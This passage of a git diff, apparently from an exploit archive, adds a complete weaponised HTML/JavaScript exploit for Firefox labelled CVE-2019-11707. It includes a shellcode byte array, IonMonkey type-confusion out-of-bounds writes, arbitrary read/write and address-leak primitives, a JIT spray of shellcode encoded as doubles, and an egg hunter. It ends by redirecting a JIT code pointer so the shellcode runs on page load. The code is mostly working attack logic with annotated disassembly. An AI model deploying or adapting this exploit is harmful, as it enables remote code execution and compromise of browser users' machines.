0xf0, 0x0f, 0x86, 0x10, 0x01, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xe0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x31, 0xd2, 0x48, 0x89, 0xc1, 0xe8, 0xf7, 0x00, 0x00, 0x00, 0x3b, 0x45, 0xf0, 0x0f, 0x85, 0xda, 0x00, 0x00, 0x00, 0x48, 0x89, 0xf0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0xd8, 0x48, 0x0f, 0xb7, 0x04, 0x02, 0x48, 0x8d, 0x0c, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x1c, 0x11, 0x48, 0x01, 0xd8, 0x48, 0x89, 0x45, 0xc8, 0x48, 0x8b, 0x4d, 0xe8, 0x48, 0x89, 0xca, 0x48, 0x31, 0xdb, 0x8b, 0x5d, 0xc0, 0x48, 0x01, 0xda, 0x48, 0x39, 0xc8, 0x0f, 0x8c, 0xa0, 0x00, 0x00, 0x00, 0x48, 0x39, 0xd0, 0x0f, 0x8d, 0x97, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfd, 0xff, 0xff, 0x8a, 0x14, 0x08, 0x80, 0xfa, 0x00, 0x74, 0x2f, 0x80, 0xfa, 0x2e, 0x75, 0x20, 0xc7, 0x03, 0x2e, 0x64, 0x6c, 0x6c, 0x48, 0x83, 0xc3, 0x04, 0xc6, 0x03, 0x00, 0xeb, 0x05, 0x90, 0x90, 0x90, 0x90, 0x90, 0x48, 0x8d, 0x9d, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0xff, 0xc1, 0xeb, 0xd3, 0x88, 0x13, 0x48, 0xff, 0xc1, 0x48, 0xff, 0xc3, 0xeb, 0xc9, 0xc6, 0x03, 0x00, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfd, 0xff, 0xff, 0xe8, 0x46, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x47, 0xfe, 0xff, 0xff, 0x48, 0x85, 0xc0, 0x74, 0x2e, 0x48, 0x89, 0x45, 0xb8, 0x48, 0x31, 0xd2, 0x48, 0x8d, 0x8d, 0xb0, 0xfe, 0xff, 0xff, 0xe8, 0x26, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0xb8, 0xe8, 0x82, 0xfe, 0xff, 0xff, 0x48, 0x89, 0x45, 0xc8, 0xeb, 0x09, 0x48, 0xff, 0xc6, 0x90, 0xe9, 0xe0, 0xfe, 0xff, 0xff, 0x48, 0x8b, 0x45, 0xc8, 0x5e, 0x5f, 0x48, 0x89, 0xec, 0x5d, 0xc3, 0x57, 0x48, 0x89, 0xd7, 0x48, 0x31, 0xdb, 0x80, 0x39, 0x00, 0x74, 0x1a, 0x0f, 0xb6, 0x01, 0x0c, 0x60, 0x0f, 0xb6, 0xd0, 0x01, 0xd3, 0x48, 0xd1, 0xe3, 0x48, 0xff, 0xc1, 0x48, 0x85, 0xff, 0x74, 0xe6, 0x48, 0xff, 0xc1, 0xeb, 0xe1, 0x48, 0x89, 0xd8, 0x5f, 0xc3,  ]);
+var JITIterations = 10000; // Number of iterations needed to trigger JIT compilation of code. The compilation count threshold varies and this is typically overkill (10+ or 1000+ is often sufficient) but is the most stable count I've tested.
+var HelperBuf = new ArrayBuffer(8);
+var HelperDbl = new Float64Array(HelperBuf);
+var HelperDword = new Uint32Array(HelperBuf);
+var HelperWord = new Uint16Array(HelperBuf);
+
+var OverflowArrays = []
+OverflowArrays.push(new ArrayBuffer(0x20));
+OverflowArrays.push(new ArrayBuffer(0x20));
+OverflowArrays.push(new ArrayBuffer(0x20));
+OverflowArrays.push(new ArrayBuffer(0x20));
+OverflowArrays.push(new ArrayBuffer(0x20));
+OverflowArrays.push(new ArrayBuffer(0x20)); // <- Overflow from here
+OverflowArrays.push(new ArrayBuffer(0x20));
+OverflowArrays.push(new ArrayBuffer(0x20));
+OverflowArrays.push(new ArrayBuffer(0x20));
+OverflowArrays.push(new ArrayBuffer(0x20));
+
+var BugArrayBuf = OverflowArrays[5];
+var CorruptedArrayBuf = OverflowArrays[6];
+var MutableArray = OverflowArrays[7];
+var BugArrayUint32 = new Uint32Array(BugArrayBuf);
+var SparseTrapdoorArray = [BugArrayUint32, BugArrayUint32];
+
+////////
+////////
+// Debug/timer code
+////////
+
+const EnableDebug = false;
+const EnableTimers = false;
+const AlertOutput = true;
+var TimeStart;
+var ReadCount;
+
+function StartTimer() {
+    ReadCount = 0;
+    TimeStart = new Date().getTime();
+}
+
+function EndTimer(Message) {
+    var TotalTime = (new Date().getTime() - TimeStart);
+
+    if(EnableTimers) {
+        if(AlertOutput) {
+            alert("TIME ... " + Message + " time elapsed: " + TotalTime.toString(10) + " read count: " + ReadCount.toString(10));
+        }
+        else {
+            console.log("TIME ... " + Message + " time elapsed: " + TotalTime.toString(10) + " read count: " + ReadCount.toString(10));
+        }
+    }
+}
+
+function DebugLog(Message) {
+    if(EnableDebug) {
+        if(AlertOutput) {
+            alert(Message);
+        }
+        else {
+            console.log(Message); // In IE, console only works if devtools is open.
+        }
+    }
+}
+
+/*//////
+////////
+// JIT bug logic/initialization
+////////
+
+What follows is the machine code generated by IonMonkey for the bugged JS function.
+
+0000014FA8BC7CA0 | 48:83EC 20               | sub rsp,20                              |
+0000014FA8BC7CA4 | 48:8B4424 40             | mov rax,qword ptr ss:[rsp+40]           |
+0000014FA8BC7CA9 | 48:C1E8 2F               | shr rax,2F                              |
+0000014FA8BC7CAD | 3D F3FF0100              | cmp eax,1FFF3                           |
+0000014FA8BC7CB2 | 0F85 E3020000            | jne 14FA8BC7F9B                         |
+0000014FA8BC7CB8 | 48:8B4424 48             | mov rax,qword ptr ss:[rsp+48]           |
+0000014FA8BC7CBD | 48:C1E8 2F               | shr rax,2F                              |
+0000014FA8BC7CC1 | 3D F1FF0100              | cmp eax,1FFF1                           |
+0000014FA8BC7CC6 | 0F85 CF020000            | jne 14FA8BC7F9B                         |
+0000014FA8BC7CCC | E9 04000000              | jmp 14FA8BC7CD5                         |
+0000014FA8BC7CD1 | 48:83EC 20               | sub rsp,20                              |
+0000014FA8BC7CD5 | 49:BB 785F225A7F000000   | mov r11,7F5A225F78                      |
+...
+0000014FA8BC7EBC | 49:8961 70               | mov qword ptr ds:[r9+70],rsp            |
+0000014FA8BC7EC0 | 6A 00                    | push 0                                  |
+0000014FA8BC7EC2 | 4C:8BCC                  | mov r9,rsp                              |
+0000014FA8BC7EC5 | 48:83E4 F0               | and rsp,FFFFFFFFFFFFFFF0                |
+0000014FA8BC7EC9 | 41:51                    | push r9                                 |
+0000014FA8BC7ECB | 48:83EC 28               | sub rsp,28                              |
+0000014FA8BC7ECF | E8 4C020000              | call 14FA8BC8120                        |
+0000014FA8BC7ED4 | 48:83C4 28               | add rsp,28                              |
+0000014FA8BC7ED8 | 5C                       | pop rsp                                 |
+0000014FA8BC7ED9 | A8 FF                    | test al,FF                              |
+0000014FA8BC7EDB | 0F84 2F020000            | je 14FA8BC8110                          |
+0000014FA8BC7EE1 | 48:8B4C24 20             | mov rcx,qword ptr ss:[rsp+20]           |
+0000014FA8BC7EE6 | 0FAEE8                   | lfence                                  |
+0000014FA8BC7EE9 | 48:83C4 28               | add rsp,28                              |
+0000014FA8BC7EED | 4C:8BD9                  | mov r11,rcx                             |
+0000014FA8BC7EF0 | 49:C1EB 2F               | shr r11,2F                              |
+0000014FA8BC7EF4 | 41:81FB FCFF0100         | cmp r11d,1FFFC                          |
+0000014FA8BC7EFB | 0F85 E5010000            | jne 14FA8BC80E6                         |
+0000014FA8BC7F01 | 48:B8 000000000000FEFF   | mov rax,FFFE000000000000                |
+0000014FA8BC7F0B | 48:33C1                  | xor rax,rcx                             |
+0000014FA8BC7F0E | 33D2                     | xor edx,edx                             |
+0000014FA8BC7F10 | 49:BB F02DB75C7F000000   | mov r11,7F5CB72DF0                      |
+0000014FA8BC7F1A | 4C:3918                  | cmp qword ptr ds:[rax],r11              |
+0000014FA8BC7F1D | 0F85 CA010000            | jne 14FA8BC80ED                         |
+0000014FA8BC7F23 | 48:0F45C2                | cmovne rax,rdx                          |
+0000014FA8BC7F27 | 8B48 28                  | mov ecx,dword ptr ds:[rax+28]           |
+0000014FA8BC7F2A | 48:8B40 38               | mov rax,qword ptr ds:[rax+38]           |
+0000014FA8BC7F2E | 8B5424 1C                | mov edx,dword ptr ss:[rsp+1C]           |
+0000014FA8BC7F32 | 45:33DB                  | xor r11d,r11d                           |
+0000014FA8BC7F35 | 3BD1                     | cmp edx,ecx                             |
+0000014FA8BC7F37 | 0F83 0B000000            | jae 14FA8BC7F48                         |
+0000014FA8BC7F3D | 41:0F43D3                | cmovae edx,r11d                         |
+0000014FA8BC7F41 | C70490 80000000          | mov dword ptr ds:[rax+rdx*4],80         | <- Type confusion: IonMonkey JIT'd an index access for Uint32Array with a DWORD operand. By confusing the type with Uint8Array we can pass the boundscheck and corrupt 32-bits out of bounds with the SIB of this instruction
+0000014FA8BC7F48 | 48:B9 000000000080F9FF   | mov rcx,FFF9800000000000                |
+0000014FA8BC7F52 | 33C0                     | xor eax,eax                             |
+0000014FA8BC7F54 | 8B5424 1C                | mov edx,dword ptr ss:[rsp+1C]           |
+0000014FA8BC7F58 | 49:BB 545F225A7F000000   | mov r11,7F5A225F54                      |
+0000014FA8BC7F62 | 41:833B 00               | cmp dword ptr ds:[r11],0                |
+0000014FA8BC7F66 | 0F85 88010000            | jne 14FA8BC80F4                         |
+0000014FA8BC7F6C | 3D 00000100              | cmp eax,10000                           |
+0000014FA8BC7F71 | 0F8D 05000000            | jge 14FA8BC7F7C                         |
+0000014FA8BC7F77 | 83C0 01                  | add eax,1                               |
+0000014FA8BC7F7A | EB DC                    | jmp 14FA8BC7F58                         |
+0000014FA8BC7F7C | 48:83C4 20               | add rsp,20                              |
+0000014FA8BC7F80 | C3                       | ret                                     |
+*/
+
+function BuggedJITFunc(Index) {
+    if (SparseTrapdoorArray.length == 0) {
+        SparseTrapdoorArray[1] = BugArrayUint32; // Convert target array to a sparse array, being careful to preserve the type set: if it were to change, IonMonkey will de-optimize this function back to bytecode
+    }
+
+    const Uint32Obj = SparseTrapdoorArray.pop();
+    Uint32Obj[Index] = 0x80; // This will be an OOB index access which will fail its boundscheck prior to being confused with a Uint8Array
+    for (var i = 0; i < JITIterations; i++) {} // JIT compile this function
+}
+
+var CustomPrototype = [new Uint8Array(BugArrayBuf)]; // When IonMonkey JITs the bug function it will not check the type set of this custom prototype, only its ArrayPrototype. Only one element is needed since the sparse array access will be at index 0
+SparseTrapdoorArray.__proto__ = CustomPrototype;
+
+// In theory only 3 should be needed but it never works with 3, always works with 4.
+for (var i = 0; i < 4; i++) { // The function JITs itself, this iteration count is what is required to empty out the array, make it sparse, and then make the type confusion access
+    BuggedJITFunc(18); // 18*4 = 0x48: CorruptedArray.NativeObject.SlotsPtr
+
+/*
+ArrayBuffer in memory:
+
+                  +-> group                +->shape
+                  |                        |
+0x7f8e13a88280:  0x00007f8e13a798e0  0x00007f8e13aa1768
+
+                  +-> slots                +->elements (Empty in this case)
+                  |                        |
+0x7f8e13a88290:  0x0000000000000000  0x000055d6ee8ead80
+
+                  +-> Shifted pointer
+                  |   pointing to          +-> size in bytes of the data buffer
+                  |   data buffer          |
+0x7f8e13a882a0:  0x00003fc709d44160  0xfff8800000000020
+
+                  +-> Pointer
+                  |   pointing to          +-> flags
+                  |   first view           |
+0x7f8e13a882b0:  0xfffe7f8e15e00480  0xfff8800000000000
+*/
+}
+
+// Initialize mutable array properties for R/W/AddressOf primitives. Use these specific values so that it can later be verified whether slots pointer modifications have been successful.
+
+MutableArray.x = 5.40900888e-315; // Most significant bits are 0 - no tag, allows an offset of 4 to be treated as a double
+MutableArray.y = 0x41414141;
+MutableArray.z = 0; // Least significant bits are 0 - offset of 4 means that y will be treated as a double
+
+var CorruptedClone = new Uint8Array(OverflowArrays[6]);
+
+function LeakSlotsPtr() {
+    var SavedSlotsPtrBytes = CorruptedClone.slice(0x30, 0x38);
+    var LeakedSlotsPtrDbl = new Float64Array(SavedSlotsPtrBytes.buffer);
+    return LeakedSlotsPtrDbl;
+}
+
+function SetSlotsPtr(NewSlotsPtrDbl) {
+    HelperDbl[0] = NewSlotsPtrDbl;
+
+    for(var i = 0; i < 8; i++) {
+        var Temp = new Uint8Array(HelperBuf);
+        CorruptedClone[0x30 + i] = Temp[i];
+    }
+}
+
+/*//////
+////////
+// Exploit primitives
+///////*/
+
+function WeakLeakDbl(TargetAddress) {
+    var SavedSlotsPtrDbl = LeakSlotsPtr();
+    SetSlotsPtr(TargetAddress);
+    var LeakedDbl = MutableArray.x;
+    SetSlotsPtr(SavedSlotsPtrDbl);
+    return LeakedDbl;
+}
+
+function WeakWriteDbl(TargetAddress, Val) {
+    var SavedSlotsPtrDbl = LeakSlotsPtr();
+    SetSlotsPtr(TargetAddress);
+    MutableArray.x = Val;
+    SetSlotsPtr(SavedSlotsPtrDbl);
+}
+
+function WeakLeakObjectAddress(Obj) {
+    //                                             x                       y                        z
+    // MutableArray.NativeObj.SlotsPtr -> [0x????????????????] | [Target object address] | [0x????????????????]
+    MutableArray.y = Obj;
+
+    //                                             x                       y                        z
+    // MutableArray.NativeObj.SlotsPtr -> [0x????????Target o] | [bject adress????????] | [0x????????????????]
+
+    var SavedSlotsPtrDbl = LeakSlotsPtr();
+    HelperDbl[0] = SavedSlotsPtrDbl;
+    HelperDword[0] = HelperDword[0] + 4;
+    SetSlotsPtr(HelperDbl[0]);
+
+    // Patch together a double of the target object address from the two 32-bit property values
+
+    HelperDbl[0] = MutableArray.x;
+    var LeakedLow = HelperDword[1];
+    HelperDbl[0] = MutableArray.y; // Works in release, not in debug (assertion issues)
+    var LeakedHigh = HelperDword[0] & 0x00007fff; // Filter off tagged pointer bits
+    SetSlotsPtr(SavedSlotsPtrDbl);
+    HelperDword[0] = LeakedLow;
+    HelperDword[1] = LeakedHigh;
+
+    return HelperDbl[0];
+}
+
+var ExplicitDwordArray = new Uint32Array(1);
+var ExplicitDwordArrayDataPtr = null; // Save the pointer to the data pointer so we don't have to recalculate it each read
+var ExplicitDblArray = new Float64Array(1);
+var ExplicitDblArrayDataPtr = null; // Save the pointer to the data pointer so we don't have to recalculate it each read
+
+function InitStrongRWPrimitive() {
+    // Leak data view pointers from the typed arrays
+
+    HelperDbl[0] = WeakLeakObjectAddress(ExplicitDblArray);
+    HelperDword[0] = HelperDword[0] + 0x38; // Float64Array data view pointer (same as ArrayBuffer)
+    ExplicitDblArrayDataPtr = HelperDbl[0];
+
+    HelperDbl[0] = WeakLeakObjectAddress(ExplicitDwordArray);
+    HelperDword[0] = HelperDword[0] + 0x38; // Uint32Array data view pointer (same as ArrayBuffer)
+    ExplicitDwordArrayDataPtr = HelperDbl[0];
+
+    HelperDbl[0] = WeakLeakDbl(HelperDbl[0]); // In the event initialization failed, the first read will return the initial marker data in the x y and z slots of the MutableArray
+
+    if(HelperDword[0] == 0x41414141) {
+        DebugLog("Arbitrary read primitive failed");
+        window.location.reload();
+        return 0.0;
+    }
+}
+
+function StrongLeakDbl(TargetAddress) {
+    WeakWriteDbl(ExplicitDblArrayDataPtr, TargetAddress);
+    return ExplicitDblArray[0];
+}
+
+function StrongWriteDword(TargetAddress, Value) {
+    WeakWriteDbl(ExplicitDwordArrayDataPtr, TargetAddress);
+    ExplicitDwordArray[0] = Value;
+}
+
+function StrongLeakDword(TargetAddress){
+    WeakWriteDbl(ExplicitDwordArrayDataPtr, TargetAddress);
+    return ExplicitDwordArray[0];
+}
+
+function GetJSFuncJITInfoPtr(JSFuncObj) {
+    HelperDbl[0] = WeakLeakObjectAddress(JSFuncObj); // The JSFunction object address associated with the (now JIT compiled) shellcode data.
+    HelperDword[0] = HelperDword[0] + 0x30; // JSFunction.u.native.extra.jitInfo_ contains a pointer to the +RX JIT region at offset 0 of its struct.
+    var JITInfoAddress = WeakLeakDbl(HelperDbl[0]);
+    return JITInfoAddress;
+}
+
+function GetJSFuncJITCodePtr(JSFuncObj) {
+    var JITInfoAddress = GetJSFuncJITInfoPtr(JSFuncObj);
+
+    if(JITInfoAddress) {
+        var JITCodePtr = WeakLeakDbl(JITInfoAddress); // Leak the address to the compiled JIT assembly code associated with the JIT'd shellcode function from its JitInfo struct (it is a pointer at offset 0 of this struct)
+        return JITCodePtr;
+    }
+
+    return 0.0;
+}
+
+/*//////
+////////
+// JIT spray/egghunter shellcode logic
+////////
+
+JIT spray in modern Firefox 64-bit on Windows seems to behave very differently
+when a special threshold of 100 double float constants are planted into a single
+function and JIT sprayed. When more than 100 are implanted, the JIT code pointer
+for the JIT sprayed function will look as follows:
+
+00000087EB6F5280 | E9 23000000              | jmp 87EB6F52A8                   <- JIT code pointer for JIT sprayed function points here
+00000087EB6F5285 | 48:B9 00D0F2F8F1000000   | mov rcx,F1F8F2D000
+00000087EB6F528F | 48:8B89 60010000         | mov rcx,qword ptr ds:[rcx+160]
+00000087EB6F5296 | 48:89A1 D0000000         | mov qword ptr ds:[rcx+D0],rsp
+00000087EB6F529D | 48:C781 D8000000 0000000 | mov qword ptr ds:[rcx+D8],0
+00000087EB6F52A8 | 55                       | push rbp
+00000087EB6F52A9 | 48:8BEC                  | mov rbp,rsp
+00000087EB6F52AC | 48:83EC 48               | sub rsp,48
+00000087EB6F52B0 | C745 E8 00000000         | mov dword ptr ss:[rbp-18],0
+...
+00000087EB6F5337 | 48:BB 4141414100000000   | mov rbx,41414141                 <- Note the first double float being loaded into RBX
+00000087EB6F5341 | 53                       | push rbx
+00000087EB6F5342 | 49:BB D810EAFCF1000000   | mov r11,F1FCEA10D8
+00000087EB6F534C | 49:8B3B                  | mov rdi,qword ptr ds:[r11]
+00000087EB6F534F | FF17                     | call qword ptr ds:[rdi]
+00000087EB6F5351 | 48:83C4 08               | add rsp,8
+00000087EB6F5355 | 48:B9 40807975083D0000   | mov rcx,3D0875798040
+00000087EB6F535F | 49:BB E810EAFCF1000000   | mov r11,F1FCEA10E8
+00000087EB6F5369 | 49:8B3B                  | mov rdi,qword ptr ds:[r11]
+00000087EB6F536C | FF17                     | call qword ptr ds:[rdi]
+00000087EB6F536E | 48:BB 9090554889E54883   | mov rbx,8348E58948559090
+00000087EB6F5378 | 53                       | push rbx
+00000087EB6F5379 | 49:BB F810EAFCF1000000   | mov r11,F1FCEA10F8
+00000087EB6F5383 | 49:8B3B                  | mov rdi,qword ptr ds:[r11]
+00000087EB6F5386 | FF17                     | call qword ptr ds:[rdi]
+00000087EB6F5388 | 48:83C4 08               | add rsp,8
+00000087EB6F538C | 48:B9 40807975083D0000   | mov rcx,3D0875798040
+00000087EB6F5396 | 49:BB 0811EAFCF1000000   | mov r11,F1FCEA1108
+00000087EB6F53A0 | 49:8B3B                  | mov rdi,qword ptr ds:[r11]
+00000087EB6F53A3 | FF17                     | call qword ptr ds:[rdi]
+...
+
+Rather than implanting the double float constants into the JIT'd code region as
+an array of raw constant data, the JIT engine has created a (very large) quantity
+of code which manually handles each individual double float one by one (this code
+goes on much further than I have pasted here). You can see this at:
+
+00000087EB6F5337 | 48:BB 4141414100000000   | mov rbx,41414141
+
+This is the first double float 5.40900888e-315 (the stage one shellcode egg)
+being loaded into RBX, where each subsequent double is treated the same.
+
+In contrast, any JIT sprayed function with less than 100 double floats yields
+a substantially different region of code at its JIT code pointer:
+
+000002C6944D4470 | 48:8B4424 20             | mov rax,qword ptr ss:[rsp+20]    <- JIT code pointer for JIT sprayed function points here
+000002C6944D4475 | 48:C1E8 2F               | shr rax,2F
+000002C6944D4479 | 3D F3FF0100              | cmp eax,1FFF3
+000002C6944D447E | 0F85 A4060000            | jne 2C6944D4B28
+...
+000002C6944D4ACB | F2:0F1180 C00A0000       | movsd qword ptr ds:[rax+AC0],xmm0
+000002C6944D4AD3 | F2:0F1005 6D030000       | movsd xmm0,qword ptr ds:[2C6944D4E48]
+000002C6944D4ADB | F2:0F1180 C80A0000       | movsd qword ptr ds:[rax+AC8],xmm0
+000002C6944D4AE3 | F2:0F1005 65030000       | movsd xmm0,qword ptr ds:[2C6944D4E50]
+000002C6944D4AEB | F2:0F1180 D00A0000       | movsd qword ptr ds:[rax+AD0],xmm0
+000002C6944D4AF3 | F2:0F1005 5D030000       | movsd xmm0,qword ptr ds:[2C6944D4E58]
+000002C6944D4AFB | F2:0F1180 D80A0000       | movsd qword ptr ds:[rax+AD8],xmm0
+000002C6944D4B03 | 48:B9 000000000080F9FF   | mov rcx,FFF9800000000000
+000002C6944D4B0D | C3                       | ret
+000002C6944D4B0E | 90                       | nop
+000002C6944D4B0F | 90                       | nop
+000002C6944D4B10 | 90                       | nop
+000002C6944D4B11 | 90                       | nop
+000002C6944D4B12 | 90                       | nop
+000002C6944D4B13 | 90                       | nop
+000002C6944D4B14 | 90                       | nop
+000002C6944D4B15 | 90                       | nop
+000002C6944D4B16 | 49:BB 30B14E5825000000   | mov r11,25584EB130
+000002C6944D4B20 | 41:53                    | push r11
+000002C6944D4B22 | E8 C9C6FBFF              | call 2C6944911F0
+000002C6944D4B27 | CC                       | int3
+000002C6944D4B28 | 6A 00                    | push 0
+000002C6944D4B2A | E9 11000000              | jmp 2C6944D4B40
+000002C6944D4B2F | 50                       | push rax
+000002C6944D4B30 | 68 20080000              | push 820
+000002C6944D4B35 | E8 5603FCFF              | call 2C694494E90
+000002C6944D4B3A | 58                       | pop rax
+000002C6944D4B3B | E9 85F9FFFF              | jmp 2C6944D44C5
+000002C6944D4B40 | 6A 00                    | push 0
+000002C6944D4B42 | E9 D9C5FBFF              | jmp 2C694491120
+000002C6944D4B47 | F4                       | hlt
+000002C6944D4B48 | 41414141:0000            | add byte ptr ds:[r8],al          <- JIT sprayed egg double
+000002C6944D4B4E | 0000                     | add byte ptr ds:[rax],al
+000002C6944D4B50 | 90                       | nop                              <- JIT sprayed shellcode begins here
+000002C6944D4B51 | 90                       | nop
+000002C6944D4B52 | 55                       | push rbp
+000002C6944D4B53 | 48:89E5                  | mov rbp,rsp
+000002C6944D4B56 | 48:83EC 40               | sub rsp,40
+000002C6944D4B5A | 48:83EC 08               | sub rsp,8
+000002C6944D4B5E | 40:80E4 F7               | and spl,F7
+000002C6944D4B62 | 48:B8 1122334455667788   | mov rax,8877665544332211
+000002C6944D4B6C | 48:8945 C8               | mov qword ptr ss:[rbp-38],rax
+000002C6944D4B70 | 48:C7C1 884E0D00         | mov rcx,D4E88
+000002C6944D4B77 | E8 F9000000              | call 2C6944D4C75
+
+This then introduces another constaint on JIT spraying beyoond forcing your
+assembly bytecode to be 100% valid double floats. You are also limited to a
+maximum of 100 doubles (800 bytes) including your egg prefix.
+*/
+
+function JITSprayFunc(){
+    Egg = 5.40900888e-315; // AAAA\x00\x00\x00\x00
+    X1 = 58394.27801956298;
+    X2 = -3.384548150597339e+269;
+    X3 = -9.154525457562153e+192;
+    X4 = 4.1005939302288804e+42;
+    X5 = -5.954550387086224e-264;
+    X6 = -6.202600667005017e-264;
+    X7 = 3.739444822644755e+67;
+    X8 = -1.2650161464211396e+258;
+    X9 = -2.6951286493033994e+35;
+    X10 = 1.3116505146398627e+104;
+    X11 = -1.311379727091241e+181;
+    X12 = 1.1053351980286266e-265;
+    X13 = 7.66487078033362e+42;
+    X14 = 1.6679557218696946e-235;
+    X15 = 1.1327634929857868e+27;
+    X16 = 6.514949632148056e-152;
+    X17 = 3.75559130646382e+255;
+    X18 = 8.6919639111614e-311;
+    X19 = -1.0771492276655187e-142;
+    X20 = 1.0596460749348558e+39;
+    X21 = 4.4990090566228275e-228;
+    X22 = 2.6641556100123696e+41;
+    X23 = -3.695293685173417e+49;
+    X24 = 7.675324624976707e-297;
+    X25 = 5.738262935249441e+40;
+    X26 = 4.460149175031513e+43;
+    X27 = 8.958658002980807e-287;
+    X28 = -1.312880373645135e+35;
+    X29 = 4.864674571015197e+42;
+    X30 = -2.500435320470142e+35;
+    X31 = -2.800945285957394e+277;
+    X32 = 1.44103957698964e+28;
+    X33 = 3.8566513062216665e+65;
+    X34 = 1.37405680231e-312;
+    X35 = 1.6258034990195507e-191;
+    X36 = 1.5008582713363865e+43;
+    X37 = 3.1154847750709123;
+    X38 = -6.809578792021008e+214;
+    X39 = -7.696699288147737e+115;
+    X40 = 3.909631192677548e+112;
+    X41 = 1.5636948002514616e+158;
+    X42 = -2.6295656969507476e-254;
+    X43 = -6.001472476578534e-264;
+    X44 = 9.25337251529007e-33;
+    X45 = 4.419915842157561e-80;
+    X46 = 8.07076629722016e+254;
+    X47 = 3.736523284e-314;
+    X48 = 3.742120352320771e+254;
+    X49 = 1.0785207713761078e-32;
+    X50 = -2.6374368557341455e-254;
+    X51 = 1.2702053652464168e+145;
+    X52 = -1.3113796337500435e+181;
+    X53 = 1.2024564583763433e+111;
+    X54 = 1.1326406542153807e+104;
+    X55 = 9.646933740426927e+39;
+    X56 = -2.5677414592270957e-254;
+    X57 = 1.5864445474697441e+233;
+    X58 = -2.6689139052065564e-251;
+    X59 = 1.0555057376604044e+27;
+    X60 = 8.364524068863995e+42;
+    X61 = 3.382975178824556e+43;
+    X62 = -8.511722322449098e+115;
+    X63 = -2.2763239573787572e+271;
+    X64 = -6.163839243926498e-264;
+    X65 = 1.5186209005088964e+258;
+    X66 = 7.253360348539147e-192;
+    X67 = -1.2560830051206045e+234;
+    X68 = 1.102849544e-314;
+    X69 = -2.276324008154652e+271;
+    X70 = 2.8122150524016884e-71;
+    X71 = 5.53602304257365e-310;
+    X72 = -6.028598990540894e-264;
+    X73 = 1.0553922879130128e+27;
+    X74 = -1.098771600725952e-244;
+    X75 = -2.5574368247075522e-254;
+    X76 = 3.618778572061404e-171;
+    X77 = -1.4656824334476123e+40;
+    X78 = 4.6232700581905664e+42;
+    X79 = -3.6562604268727894e+125;
+    X80 = -2.927408487880894e+78;
+    X81 = 1.087942540606703e-309;
+    X82 = 6.440226123500225e+264;
+    X83 = 3.879424446462186e+148;
+    X84 = 3.234472631797124e+40;
+    X85 = 1.4186706350383543e-307;
+    X86 = 1.2617245769382784e-234;
+    X87 = 1.3810793979336581e+43;
+    X88 = 1.565026152201332e+43;
+    X89 = 5.1402745833993635e+153;
+    X90 = 9.63e-322;
+}
+
+function EggHunter(TargetAddressDbl) {
+    var ScanPtr = TargetAddressDbl;
+
+    for(var i = 0; i < 1000; i++) { // 1000 QWORDs give me the most stable result. The more double float constants are in the JIT'd function, the more handler code seems to precede them.
+        HelperDbl[0] = ScanPtr;
+        var DblVal = StrongLeakDbl(ScanPtr); // The JIT'd ASM code being scanned is likely to contain 8 byte sequences which will not be interpreted as doubles (and will have tagged pointer bits set). Use explicit/strong primitive for these reads.
+
+        if(DblVal == 5.40900888e-315) {
+            HelperDbl[0] = ScanPtr;
+            HelperDword[0] = HelperDword[0] + 8; // Skip over egg bytes and return precise pointer to the shellcode
+            return HelperDbl[0];
+        }
+
+        HelperDbl[0] = ScanPtr;
+        HelperDword[0] = HelperDword[0] + 8;
+        ScanPtr = HelperDbl[0];
+    }
+
+    return 0.0;
+}
+
+////////
+////////
+// Primary high level exploit logic
+////////
+
+function CVE_2019_11707() {
+    for(var i = 0; i < JITIterations; i++) {
+        JITSprayFunc(); // JIT spray the shellcode to a private +RX region of virtual memory
+    }
+
+    var JITCodePtr = GetJSFuncJITCodePtr(JITSprayFunc);
+
+    if(JITCodePtr) {
+        // Setup the strong read primitive for the stage one egg hunter: attempting to interpret assembly byte code as doubles via weak primitive may crash the process (tagged pointer bits could cause the read value to be dereferenced as a pointer)
+
+        HelperDbl[0] = JITCodePtr;
+        DebugLog("JIT spray code pointer is 0x" + HelperDword[1].toString(16) + HelperDword[0].toString(16));
+        InitStrongRWPrimitive();
+        ShellcodeAddress = EggHunter(JITCodePtr); // For this we need the strong read primitive since values here can start with 0xffff and thus act as tags
+
+        if(ShellcodeAddress) {
+            // Trigger code exec by calling the JIT sprayed function again. Its code pointer has been overwritten to now point to the literal shellcode data within the JIT'd function
+
+            HelperDbl[0] = ShellcodeAddress;
+            DebugLog("Shellcode pointer is 0x" + HelperDword[1].toString(16) + HelperDword[0].toString(16));
+            var JITInfoAddress = GetJSFuncJITInfoPtr(JITSprayFunc);
+            WeakWriteDbl(JITInfoAddress, ShellcodeAddress);
+            JITSprayFunc(); // Notably the location of the data in the stage two shellcode Uint8Array can be found at offset 0x40 from the start of the array object when the array is small, and when it is large a pointer to it can be found at offset 0x38 from the start of the array object. In this case though, the stage one egg hunter shellcode finds, disables DEP and ADDITIONALLY executes the stage two shellcode itself, so there is no reason to locate/execute it from JS.
+        }
+        else {
+            DebugLog("Failed to resolve shellcode address");
+        }
+    }
+}
+
+CVE_2019_11707();
+</script>
+</body>
+</html>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index e389c6df1..31469f7e0 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11392,6 +11392,7 @@ id,file,description,date,author,type,platform,port
 50047,exploits/windows/local/50047.txt,"Remote Mouse GUI 3.008 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
 50083,exploits/windows/local/50083.txt,"WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control",1970-01-01,"Andrea Intilangelo",local,windows,
